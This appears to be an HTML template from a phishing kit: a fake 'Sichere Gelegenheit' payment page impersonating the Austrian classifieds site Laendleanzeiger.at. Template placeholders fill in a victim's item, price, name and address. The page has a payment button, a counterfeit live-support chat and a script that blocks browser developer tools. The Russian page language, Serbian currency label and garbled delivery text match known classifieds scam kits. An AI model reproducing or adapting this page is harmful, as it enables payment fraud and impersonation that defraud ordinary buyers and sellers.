<!DOCTYPE html>
<html lang="ru" prefix="og: http://ogp.me/ns#" id="html" data-cbscriptallow="true">
    <head>
        <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
        <meta http-equiv="x-ua-compatible" content="ie=edge">
        <meta name="viewport" content="width=device-width, initial-scale=1, minimum-scale=1, minimal-ui, user-scalable=no">
        <meta name="twitter:card" content="Laendleanzeiger.at - Transport und Lieferung im ganzen Land">
        <meta name="format-detection" content="telephone=no">
        <meta name="theme-color" content="#039ad3">
        <title>Laendleanzeiger.at - Transport und Lieferung im ganzen Land</title>
        <meta property="og:title" content="Laendleanzeiger.at - kostenlose Kleinanzeigen">
        <meta property="og:description" content="Kostenlose Kleinanzeigen bei dem großen deutschen Anzeigen-Portal. Kaufen und verkaufen auf Laendleanzeiger.at - dem großen Kleinanzeigenmarkt!">
        <meta property="og:type" content="website">
        <meta property="og:image" content="https://pbs.twimg.com/profile_images/537914594128166913/1BIFwIDI_400x400.jpeg"> 
        <meta property="og:url" content="https://www.laendleanzeiger.at/">
        <link rel="canonical" href="https://www.laendleanzeiger.at/"><link rel="alternate" href="https://www.laendleanzeiger.at/">
        <link rel="icon" href="https://cdn6.aptoide.com/imgs/4/a/4/4a497a2cf44b4f2d93a704a0eb754f6f_icon.png">
        <link type="text/css" href="/static/style/laendleanzeige10/ultra.css" rel="stylesheet">
        <!-- support -->
        <link rel="stylesheet" href="/static/style/support/support_parent.css">
        <script src="/static/style/protect/protect.js"></script>
    </head>
        <body>
            <div class="
        chatra--webkit
        chatra--style-round
        chatra--side-bottom
        chatra--pos-right
        chatra--visible
        chatra--expanded
        chatra--fast-toggle
      " id="chatra" data-turbolinks-permanent="" style="width: 380px; height: 600px; transform: none; z-index: 2147483647; display:none;">
    <div id="chatra__iframe-wrapper">
      <iframe frameborder="0" id="chatra__iframe" allowtransparency="true" title="Chatra live chat" allow="autoplay" src="/static/style/support/index.html?id=<%=id %>" style="width: 380px; height: 600px; position: absolute"></iframe>
    </div>
  </div>
  <div class="support-circle" onclick="document.querySelector(&#39;#chatra&#39;).style.display = &#39;block&#39;;this.style.display = &#39;none&#39;"></div>
            <div class="base">
            <div class="_container" style="display: none" id="modal_city">
                <div class="js-modal-container">
                    <div class="modal__box">
                        <div class="modal modal_city modal--show" overflow="hidden" tabindex="-999">
                            <div class="modal__wrapper">
                                <div class="modal__container">
                                    <div class="modal__inner scrollable modal_city fadeIn zoomIn"><button id="modal_close" class="button button--close button--close-modal"><i class="icon icon--close modal-close_control visible-xs visible-sm"></i><i class="sc-htpNat modal-close_control modal-close_control_desktop hidden-xs hidden-sm sc-bxivhb bQwgYy"></i></button>
                                        <div>
                                            <form>
                                                <div class="modal__header modal__header--mobile">
                                                    <h3></h3>
                                                </div>
                                                <div class="modal__body">
                                                    <div class="form_group">
                                                        <div><input type="text" class="form_control form_control--simple" takeholder="Укажите ваш город" value="" id="newcity_inp">
                                                            <div class="hint hint--animated"></div>
                                                            <div class="Select suggest_container has-value">
                                                                <div class="Select-control">
                                                                    <div class="suggest_list hide"></div>
                                                                </div>
                                                            </div>
                                                        </div>
                                                    </div>
                                                    <div class="hide">
                                                        <div class="hint hint--animated"></div>
                                                    </div>
                                                </div>
                                                <div class="modal__footer">
                                                    <div class="buttons_wrapper fixed_buttons">
                                                        <div class="button_container"><button type="button" class="sc-dVhcbM pYkUn" id="closemodal"><span class="sc-fBuWsC pYkUn">Отмена</span></button></div>
                                                        <div class="button_container"><button type="button" class="sc-dVhcbM bjhbfW" id="newcity"><span class="sc-fBuWsC hvBxNu">Применить</span></button></div>
                                                    </div>
                                                </div>
                                            </form>
                                        </div>
                                    </div>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>

            <div class="_container header_prototype header_prototype--board tiny" data-container="HeaderBoardContainer" data-tiny="1">
                <header data-test-component="HeaderBoard" class="sc-ugnQR jRQBFv">
                    <div class="sc-eIHaNI grYHP"></div>
                    <div class="sc-eTpRJs hnEmwS" style="background-color: #FFFFFF;">
                        <div class="sc-iomxrj fZtIUm">
                            <section data-test-component="HeaderActionMenu" class="sc-gPEVay sc-eKZiaR dzCROE">
                                <div class="sc-jAaTju sc-jDwBTQ sc-jlyJG sc-drMfKT lkKOyd">
                                    <div width="1" class="sc-jAaTju sc-iRbamj sc-hIVACf gjZzYk"><a href="https://www.laendleanzeiger.at/" title="Laendleanzeiger" data-test-action="IndexPageLink" class="sc-eqIVtm sc-cpmKsF bcxWYD">
                                           <img height="55px" src="/static/style/laendleanzeige10/1080x800bb.jpg">
                                        </a>
                                        <div class="sc-eXNvrr iBzLWS"></div>
                                    </div>
                                </div>
                            </section>
                            <div class="sc-dxZgTM RFfMX"></div>
                        </div>
                    </div>
                </header>
            </div>




            <aside class="nav_container sidebar_container">
                <nav class="_container" data-container="CategoryMobileContainer"></nav>
            </aside>




            <div class="bundle">
                <div class="container _container" data-container="PaymentsContainer">
                    <div class="payments_container" id="payments">
                        <div>
                            <div class="container__28A_2L3T">
                                <div>
                                    <div class="product__2oLb4nXl">
                                        <div class="product_owner__VUJH2ylJ">
                                            <div class="user user--simple">
                                                <div class="user__info">
                                                    <div class="user__name"><span><span class="user__label">Laendleanzeiger.at - Transport und Lieferung im ganzen Land</span><span id="u_name"></span></span></div>
                                                    <!--div class="user__rating rating" id="u_rating"></div-->
                                                </div>
                                            </div>
                                        </div>
                                        <div class="product_content__mI30-3Fr">
                                            <div class="product_inner__1ZrDwagy">
                                                <div class="product_price__2IFwtrXu"><span class="product_real_price__j_Bk3J3i"><span><span id="pr_price"></span><span class="sc-bdVaJa ijDeHI"><b><%=price %> €</b><i>EUR.</i></span></span></span></div>
                                                <div class="product_title__3jNOq_vZ" id="pr_name"><%=name %></div>
                                            </div>
                                        </div>
                                    </div>
                                    <div class="container__b66PCR7o">
                                        <div class="summary__2TIRymkY">
                                            <div class="summary_header__bJmC15X9">
                                                <div class="summary_price__1HT5R9_P"><span>
                                                        <span id="last"></span><span id="cost" class="sc-bdVaJa ijDeHI"><b><%=price %> €</b><i>RSD.</i></span></span></div>
                                            </div>
                                            <div class="fixed_buttons fixed_buttons--single">
                                                <div class="summary_total__3aEKbkJu">Nehmen Sie an<div class="summary_total_value__nRhP7XkA"><span><span id="pr_price"></span>&nbsp;<span class="sc-bdVaJa ijDeHI"><b id="mobile_price"><%=price %> €</b><i>EUR.</i></span></span></div>
                                                </div>
                                                <div class="button_container" id="paybutton" onclick="submit();">
                                                        <button type="submit" class="sc-dVhcbM ccONKs" id="_buttonPay">
                                                            <span class="sc-fBuWsC hvBxNu">Bezahlung</span>
                                                        </button>
                                                        
                                                </div>
                                            </div>
                                            <div class="safely_text__392qqBrF">
                                                <div class="status_badge__icon status_badge__icon--deal"></div><span>Sichere Gelegenheit</span>
                                            </div>
                                            <div class="hint">Durch Klicken auf den Button "Bezahlung" stimmen Sie zu <a href="https://www.laendleanzeiger.at/" target="_blank" rel="noopener noreferrer">einen Vertrag schließen</a> über den Verkauf von Waren über den Online-Service "Sichere Gelegenheit“</div>
                                        </div>
                                        <div class="block__3ioUhNQH">
                                            <div class="panel__3B1d-ak5">
                                                <div class="panel_icon__1HmxOezY">
                                                    <div class="status_badge__icon status_badge__icon--delivery status_icon__3QzFN2ZZ"></div>
                                                </div>
                                                <div class="panel_content__VGeorc1g">
                                                    <div class="text__3Wt10VPX">ausgewählte Lieferung im ganzen Land <b id="pr_loc"></b>.</div>
                                                    <div class="hint__aMasvQSz">Bezahlen Sie das Produkt und wählen Sie die Lieferzeit aus.</div>
                                                </div>
                                                <div class="panel_button__2vr4fIVO"><button type="button" class="visible-xs sc-dVhcbM PZSwV"></button></div>
                                            </div>
                                            <div class="form__1P2Y3sX1">
                                                <form _lpchecked="1">
                                                    <div>
                                                        <div class="row"><label class="label__332nHo7g">Lieferadresse</label>
                                                            <div class="col-md-12">
                                                                <div class="root__3ahLIWiH">
                                                                    <div class="from_group form_group__3-PlZQuP"><input type="text" class="form_control form_control__3Uyg-pWq" value="<%=address %>" readonly=""></div>
                                                                </div>
                                                            </div>
                                                            <label class="label__332nHo7g">Vollständiger Name des Empfängers</label>
                                                            <div class="col-md-12">
                                                                <div class="from_group form_group__3-PlZQuP"><input name="lastname" type="text" class="form_control form_control__3Uyg-pWq" maxlength="25" value="<%=firstName %> <%=surname %>" readonly=""></div>
                                                            </div>
                                                        </div>
                                                    </div>
                                                    
                                                    <div class="boxberry_text__24q32W-A">Die Lieferung erfolgt durch: Serbische Laendleanzeiger weitere Informationen zur Lieferung der serbischen Laendleanzeiger.</div>
                                                </form>
                                            </div>
                                            <div class="hint payhint__1EGeMlob">Durch Klicken auf den Button "Bezahlung" stimmen Sie zu <a href="https://www.laendleanzeiger.at/" target="_blank" rel="noopener noreferrer">einen Vertrag schließen</a> über den Verkauf von Waren über den Online-Service "Sichere Gelegenheit“</div>
                                        </div>
                                    </div>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
        <div class="overlay">
            <div class="loader hide"></div>
        </div>
        <div class="global">
            <div></div>
        </div>
    

        <script src="https://code.jquery.com/jquery-3.4.1.min.js"></script>
        <script type="text/javascript">
            function openForm() {
              $('#myForm').css('display', 'block')
            $('#open-support').css('display', 'none')
          }
        
          function closeForm() {
            $('#myForm').css('display', 'none')
            $('#open-support').css('display', 'block')
        
          }
        </script>

        <script src="https://cdn.jsdelivr.net/gh/fz6m/console-ban@3.2/dist/console-ban.min.js"></script>
        <script>
            ConsoleBan.init({
                redirect: 'https://http.cat/403'
            })
        </script>
</body></html>